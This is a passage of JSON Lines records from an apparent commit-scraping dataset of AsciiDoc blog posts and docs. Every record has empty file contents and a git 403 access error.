403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3557ce763eb049f35060e5156816838b641252a7","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdb2acd6108fe43126e45a7ef14d9de2691fb5ce","subject":"Update 2017-06-13-neural_network_from_scratch.adoc","message":"Update 2017-06-13-neural_network_from_scratch.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2017-06-13-neural_network_from_scratch.adoc","new_file":"_posts\/2017-06-13-neural_network_from_scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8439b15f07c12e357fae3bd4a45797da504bd2c7","subject":"Create do-codebase-improvements-fil.adoc","message":"Create do-codebase-improvements-fil.adoc\n\nFilipino translation for do-codebase-improvements.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-codebase-improvements-fil.adoc","new_file":"src\/do\/do-codebase-improvements-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"525bfceb78af41b472b776af480863e60e68b0f5","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc6aa9b44521b64a0cd489f04e173859637e838f","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1051fc5c1970c2014be7c2b74bb3e07d3483d7d","subject":"Update 2016-02-24-Mickeys-Soundsational-Parade-live-stream-tonight.adoc","message":"Update 2016-02-24-Mickeys-Soundsational-Parade-live-stream-tonight.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-24-Mickeys-Soundsational-Parade-live-stream-tonight.adoc","new_file":"_posts\/2016-02-24-Mickeys-Soundsational-Parade-live-stream-tonight.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e12e196c749aac7546377c66ca5254800c248880","subject":"Publish 2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","message":"Publish 2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","new_file":"2012-12-4-Jogando-o-Censo-2010-no-PostgreSQL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"551884d15dc7d3ab71bce168201c742aaf7396ef","subject":"v1.78","message":"v1.78\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"39562d8dbb46bdf0fd63f23275c867d3a570c633","subject":"Update 2019-03-10-.adoc","message":"Update 2019-03-10-.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2019-03-10-.adoc","new_file":"_posts\/2019-03-10-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9ddf1ffa8db64bfdd40bfb66f872faf59d85ad7","subject":"Update 2018-12-20-jira-howtouse.adoc","message":"Update 
2018-12-20-jira-howtouse.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-20-jira-howtouse.adoc","new_file":"_posts\/2018-12-20-jira-howtouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1923a6ce36b1fe626b5230259ff6460b19ef85e2","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/create-worker\/curl-request.adoc","new_file":"xill-web-service\/tmp-test\/create-worker\/curl-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c86573cc5e9ad12db6aaae06db20e94362f45f0","subject":"Update 2015-08-15-Een-test.adoc","message":"Update 2015-08-15-Een-test.adoc","repos":"PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io","old_file":"_posts\/2015-08-15-Een-test.adoc","new_file":"_posts\/2015-08-15-Een-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PauloMoekotte\/PauloMoekotte.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14b6be6cfd0d808f6f7f7582123a2aabf2555958","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f61a2307d4dc73792e8b6c23d3008af1be72fe14","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f8e9135e0bba744dccb56345fbe82ba01818eb4","subject":"Update 2016-09-11-Chairpersons-Chinwag-August-Edition.adoc","message":"Update 2016-09-11-Chairpersons-Chinwag-August-Edition.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-09-11-Chairpersons-Chinwag-August-Edition.adoc","new_file":"_posts\/2016-09-11-Chairpersons-Chinwag-August-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c98f095b8976978fb55fdaa8495ad362d4f326f","subject":"Update 2014-03-07-Eclipse-Tips-006-activer-lautocompletion-sur-tout.adoc","message":"Update 2014-03-07-Eclipse-Tips-006-activer-lautocompletion-sur-tout.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2014-03-07-Eclipse-Tips-006-activer-lautocompletion-sur-tout.adoc","new_file":"_posts\/2014-03-07-Eclipse-Tips-006-activer-lautocompletion-sur-tout.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a15c79dcb95169c98486d77ac069c3d9aa2be7ad","subject":"Update 2016-12-26-Ultrasound-nerve-segmentation-challenge-on-Kaggle.adoc","message":"Update 2016-12-26-Ultrasound-nerve-segmentation-challenge-on-Kaggle.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-12-26-Ultrasound-nerve-segmentation-challenge-on-Kaggle.adoc","new_file":"_posts\/2016-12-26-Ultrasound-nerve-segmentation-challenge-on-Kaggle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71c0009f205cb7960f9e2a6875f08287df49b355","subject":"Fix link to Bus jira","message":"Fix link to Bus jira\n","repos":"tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,metlos\/hawkular.github.io,hawkular\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9095abe2b53ffc43a6db3fb31c5034b674f79970","subject":"Add README to 
hoverfly-java-junit5","message":"Add README to hoverfly-java-junit5\n\n\nFormer-commit-id: 2af43a670a3f2ec487fd45d56dcd4765b9f06e03","repos":"SpectoLabs\/hoverfly-java,SpectoLabs\/hoverfly-java,SpectoLabs\/hoverfly-java","old_file":"junit5\/README.adoc","new_file":"junit5\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SpectoLabs\/hoverfly-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"769971a29bb1ad6df0ed96da1d12f319f22330f4","subject":"ISIS-2062: copied Andi's notes on ConcurrentTaskList","message":"ISIS-2062: copied Andi's notes on ConcurrentTaskList\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"antora\/components\/archdesign\/modules\/ROOT\/pages\/concurrent-task-list.adoc","new_file":"antora\/components\/archdesign\/modules\/ROOT\/pages\/concurrent-task-list.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ea2c6554c8e8397dd948cde5102a24b04b8e711","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b0ec3187017758581f8baf27aa2a1b7988bcd0d","subject":"Update 2019-09-09-Model-Distillation.adoc","message":"Update 2019-09-09-Model-Distillation.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-09-09-Model-Distillation.adoc","new_file":"_posts\/2019-09-09-Model-Distillation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c82b6a10a279cab2c58f7eafc7533b881cee7845","subject":"Update 2019-01-31-nagegacao-com-tabview.adoc","message":"Update 2019-01-31-nagegacao-com-tabview.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2019-01-31-nagegacao-com-tabview.adoc","new_file":"_posts\/2019-01-31-nagegacao-com-tabview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5dcda327a33756449db55fe0472c41e3d49d011","subject":"Common Snippet - App Engine deployment configuration","message":"Common Snippet - App Engine deployment 
configuration\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-appenginedeploymentconfiguration.adoc","new_file":"src\/main\/docs\/common-appenginedeploymentconfiguration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff185313f23669face9078c12d6c1b20acfac420","subject":"docs: user guide","message":"docs: user guide\n\nChange-Id: I29f99c4a43a04ef5a1377ca2b20bb16332423771\n","repos":"default-to-open\/rpmgrill,thrix\/rpmgrill,thrix\/rpmgrill,default-to-open\/rpmgrill","old_file":"doc\/user_guide\/main.asciidoc","new_file":"doc\/user_guide\/main.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thrix\/rpmgrill.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"4ad8124175ad14f5acbfdd8e6fa6e99c51fe0023","subject":"Second batch of changes to the baseDoc file","message":"Second batch of changes to the baseDoc file\n","repos":"ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,pilhuhn\/rhq-metrics,hawkular\/hawkular-metrics,mwringe\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics,mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,ppalaga\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,burmanm\/hawkular-metrics,burmanm\/hawkular-metrics,mwringe\/hawkular-metrics,tsegismont\/hawkular-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,pilhuhn\/rhq-metrics,burmanm\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,jotak\/hawkular-metrics,tsegismont\/hawkular-metrics,hawkular\/hawkular-metrics,pilhuhn\/rhq-metrics,hawkular\/hawkular-metrics,ppalaga\/hawkular-metrics","old_file":"api\/metrics-api-jaxrs\/src\/main\/rest-doc\/base.adoc","new_file":"api\/metrics-api-jaxrs\/src\/main\/rest-doc\/base.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e6e05827810a9562dd32a5a3c344de0bb8c6909","subject":"Update 2017-05-20-Episode-99-A-Mother-of-Days.adoc","message":"Update 2017-05-20-Episode-99-A-Mother-of-Days.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-05-20-Episode-99-A-Mother-of-Days.adoc","new_file":"_posts\/2017-05-20-Episode-99-A-Mother-of-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c50c8f5dffadf62e897c70943d2105fd6588b324","subject":"Add \"How to contribute to OpenSCAP\" document","message":"Add \"How to contribute to OpenSCAP\" document\n\nThis little how-to can help new Red Hat interns and contributors with basic\nquestions that I have in the 
beginnings.\n","repos":"Hexadorsimal\/openscap,mpreisler\/openscap,openprivacy\/openscap,ybznek\/openscap,OpenSCAP\/openscap,mpreisler\/openscap,OpenSCAP\/openscap,openprivacy\/openscap,jan-cerny\/openscap,redhatrises\/openscap,OpenSCAP\/openscap,redhatrises\/openscap,redhatrises\/openscap,mpreisler\/openscap,Hexadorsimal\/openscap,ybznek\/openscap,jan-cerny\/openscap,Hexadorsimal\/openscap,openprivacy\/openscap,mpreisler\/openscap,redhatrises\/openscap,ybznek\/openscap,openprivacy\/openscap,jan-cerny\/openscap,Hexadorsimal\/openscap,openprivacy\/openscap,openprivacy\/openscap,mpreisler\/openscap,OpenSCAP\/openscap,redhatrises\/openscap,jan-cerny\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,Hexadorsimal\/openscap,jan-cerny\/openscap,redhatrises\/openscap,ybznek\/openscap,Hexadorsimal\/openscap,ybznek\/openscap,jan-cerny\/openscap,ybznek\/openscap,mpreisler\/openscap","old_file":"docs\/contribute\/contribute.adoc","new_file":"docs\/contribute\/contribute.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jan-cerny\/openscap.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"a08a594674ad4f45837bc3c8ff05416c46bc1c63","subject":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","message":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df661bb708e7e1c6b88e1ef1ac8c873b95ef47d1","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"943d25bae64866a78ccad305f4a595a2976e7ae8","subject":"y2b create post The Invisible iPhone Button...","message":"y2b create post The Invisible iPhone Button...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-27-The-Invisible-iPhone-Button.adoc","new_file":"_posts\/2017-11-27-The-Invisible-iPhone-Button.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"854102c6e666b85667fbdb0510ba80070ee921e8","subject":"Change the URL for the instructions to install ccm; the actual repo is the official documentation. (#227)","message":"Change the URL for the instructions to install ccm; the actual repo is the official documentation. 
(#227)\n\n","repos":"pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/hawkular-services\/docs\/installation-guide\/index.adoc","new_file":"src\/main\/jbake\/content\/hawkular-services\/docs\/installation-guide\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2f8d98c4467c3deb410cf4af5234d137dc1ed38","subject":"Update 2015-06-02-Everything-I-tell-you-is-wrong.adoc","message":"Update 2015-06-02-Everything-I-tell-you-is-wrong.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-06-02-Everything-I-tell-you-is-wrong.adoc","new_file":"_posts\/2015-06-02-Everything-I-tell-you-is-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9b1ff9370bbb4217dbf1ff2098e5a62f18daad3","subject":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","message":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9717c2d7fef7ccc780172ea48bd479be7e0d97c4","subject":"Add the stickler-server manpage","message":"Add the stickler-server manpage","repos":"copiousfreetime\/stickler,copiousfreetime\/stickler","old_file":"man\/stickler-server.asciidoc","new_file":"man\/stickler-server.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/copiousfreetime\/stickler.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68c4e9dd794cae9a5d8de8a80782d76b741a5064","subject":"Update 2016-09-04-Computer-Science-Week-1-The-Recounting.adoc","message":"Update 
2016-09-04-Computer-Science-Week-1-The-Recounting.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-04-Computer-Science-Week-1-The-Recounting.adoc","new_file":"_posts\/2016-09-04-Computer-Science-Week-1-The-Recounting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fab8f7b9f69e9ab732f2acd8881d4416d7f5c42","subject":"Update 2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","message":"Update 2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","new_file":"_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a22567956accfc988c26635dca863e53f4673859","subject":"y2b create post Unboxing The Mind Bending Wallpaper TV...","message":"y2b create post Unboxing The Mind Bending Wallpaper TV...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-01-Unboxing-The-Mind-Bending-Wallpaper-TV.adoc","new_file":"_posts\/2017-10-01-Unboxing-The-Mind-Bending-Wallpaper-TV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6ae1b8f77fb1bfbd6a5c0e9b7191473bf65687a","subject":"Update 2012-07-27-Berlin-la-trilogie.adoc","message":"Update 2012-07-27-Berlin-la-trilogie.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2012-07-27-Berlin-la-trilogie.adoc","new_file":"_posts\/2012-07-27-Berlin-la-trilogie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a576b126b8b9d3db862432feaa782023a9533651","subject":"Update 2015-06-15-NodeJSs-event-loop.adoc","message":"Update 2015-06-15-NodeJSs-event-loop.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-15-NodeJSs-event-loop.adoc","new_file":"_posts\/2015-06-15-NodeJSs-event-loop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 